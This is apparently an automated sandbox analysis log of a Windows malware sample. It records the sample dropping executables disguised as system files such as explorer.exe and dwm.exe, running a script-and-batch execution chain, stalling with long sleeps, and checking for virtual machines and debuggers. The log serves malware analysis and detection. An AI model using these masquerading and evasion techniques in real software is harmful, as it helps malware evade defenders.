Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\hh\explorer.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Memory allocated: 1B2B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Memory allocated: 1AC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Memory allocated: 1120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Memory allocated: 1AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Memory allocated: 1680000 memory reserve \| memory write watch
Source: C:\Recovery\jOMfQSwRhTi.exe	Memory allocated: 1B310000 memory reserve \| memory write watch
Source: C:\Windows\ShellNew\WinStore.App.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Windows\ShellNew\WinStore.App.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch
Source: C:\Windows\System32\WWanAPI\dwm.exe	Memory allocated: 13A0000 memory reserve \| memory write watch
Source: C:\Windows\System32\WWanAPI\dwm.exe	Memory allocated: 1AE50000 memory reserve \| memory write watch
Source: C:\Recovery\jOMfQSwRhTi.exe	Memory allocated: A80000 memory reserve \| memory write watch
Source: C:\Recovery\jOMfQSwRhTi.exe	Memory allocated: 1A510000 memory reserve \| memory write watch
Source: C:\Windows\hh\explorer.exe	Memory allocated: E70000 memory reserve \| memory write watch
Source: C:\Windows\hh\explorer.exe	Memory allocated: 1A9A0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 598976	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellNew\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599875
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599766
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599641
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599531
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599422
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599313
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599891
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599311
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599203
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599873
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599765
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599656
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599533
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599391
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599265
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WWanAPI\dwm.exe	Window / User API: threadDelayed 952	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Window / User API: threadDelayed 829	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Window / User API: threadDelayed 560	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Window / User API: threadDelayed 1142
Source: C:\Recovery\jOMfQSwRhTi.exe	Window / User API: threadDelayed 1308
Source: C:\Windows\hh\explorer.exe	Window / User API: threadDelayed 946

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 5464	Thread sleep count: 245 > 30	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 5464	Thread sleep count: 952 > 30	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6572	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 7208	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 7108	Thread sleep count: 829 > 30	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 7108	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599563s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 6956	Thread sleep time: -598976s >= -30000s	Jump to behavior
Source: C:\Windows\hh\explorer.exe TID: 8100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 8140	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\ShellNew\WinStore.App.exe TID: 2416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 1868	Thread sleep count: 1142 > 30
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599875s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 1868	Thread sleep count: 55 > 30
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599766s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599641s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599531s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599422s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 2024	Thread sleep time: -599313s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 1864	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WWanAPI\dwm.exe TID: 6060	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599891s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 3188	Thread sleep count: 1308 > 30
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 3188	Thread sleep count: 88 > 30
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599766s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599656s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599547s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599437s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599311s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2624	Thread sleep time: -599203s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2752	Thread sleep time: -30000s >= -30000s
Source: C:\Recovery\jOMfQSwRhTi.exe TID: 2148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7696	Thread sleep count: 249 > 30
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599873s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7696	Thread sleep count: 946 > 30
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599765s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599656s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599533s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599391s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 7656	Thread sleep time: -599265s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 4436	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\hh\explorer.exe TID: 4052	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\hh\explorer.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\ShellNew\WinStore.App.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WWanAPI\dwm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\jOMfQSwRhTi.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\hh\explorer.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006EA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_006EA5F4
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_006FB8E0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070AAA8 FindFirstFileExA,	0_2_0070AAA8

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006FDD72 VirtualQuery,GetSystemInfo,

0_2_006FDD72

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 598976	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\ShellNew\WinStore.App.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 600000
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599875
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599766
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599641
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599531
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599422
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 599313
Source: C:\Windows\System32\WWanAPI\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599891
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599311
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 599203
Source: C:\Recovery\jOMfQSwRhTi.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 600000
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599873
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599765
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599656
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599533
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599391
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 599265
Source: C:\Windows\hh\explorer.exe	Thread delayed: delay time: 922337203685477

Source: perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1439507401.000000001C02F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: dwm.exe, 0000000F.00000002.1516558497.000000001BA10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: w32tm.exe, 0000000E.00000002.1488157281.000001DEAD279000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: LisectAVT_2403002A_442.exe, 00000000.00000003.1359047807.000000000331F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: LisectAVT_2403002A_442.exe, jOMfQSwRhTi.exe1.5.dr, perfCrtmonitorsvcMonitorDll.exe.0.dr, dwm.exe.5.dr, jOMfQSwRhTi.exe0.5.dr, WinStore.App.exe.5.dr, jOMfQSwRhTi.exe.5.dr, explorer.exe.5.dr	Binary or memory string: jLowv5WJhgfsPRryPEQ
Source: LisectAVT_2403002A_442.exe, 00000000.00000003.1359047807.000000000331F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ya
Source: wscript.exe, 00000002.00000003.1415643830.0000000003483000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\qDr
Source: explorer.exe, 00000010.00000002.1516345247.000000001BD80000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000016.00000002.1608923908.000000001BB20000.00000004.00000020.00020000.00000000.sdmp, jOMfQSwRhTi.exe, 00000018.00000002.1686841830.000000001B2F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1868809645.000000001B720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

API call chain: ExitProcess graph end node

graph_0-24398

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_0070866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0070866F

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_0070753D mov eax, dword ptr fs:[00000030h]

0_2_0070753D

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_0070B710 GetProcessHeap,

0_2_0070B710

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Process token adjusted: Debug
Source: C:\Windows\ShellNew\WinStore.App.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FF063 SetUnhandledExceptionFilter,	0_2_006FF063
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006FF22B
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_0070866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0070866F
Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Code function: 0_2_006FEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006FEF05

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\ShellNew\WinStore.App.exe "C:\Windows\ShellNew\WinStore.App.exe"	Jump to behavior

Source: perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006FED5B cpuid

0_2_006FED5B

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_006FA63C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WWanAPI\dwm.exe	Queries volume information: C:\Windows\System32\WWanAPI\dwm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\hh\explorer.exe	Queries volume information: C:\Windows\hh\explorer.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\jOMfQSwRhTi.exe	Queries volume information: C:\Recovery\jOMfQSwRhTi.exe VolumeInformation
Source: C:\Windows\ShellNew\WinStore.App.exe	Queries volume information: C:\Windows\ShellNew\WinStore.App.exe VolumeInformation
Source: C:\Windows\System32\WWanAPI\dwm.exe	Queries volume information: C:\Windows\System32\WWanAPI\dwm.exe VolumeInformation
Source: C:\Recovery\jOMfQSwRhTi.exe	Queries volume information: C:\Recovery\jOMfQSwRhTi.exe VolumeInformation
Source: C:\Windows\hh\explorer.exe	Queries volume information: C:\Windows\hh\explorer.exe VolumeInformation

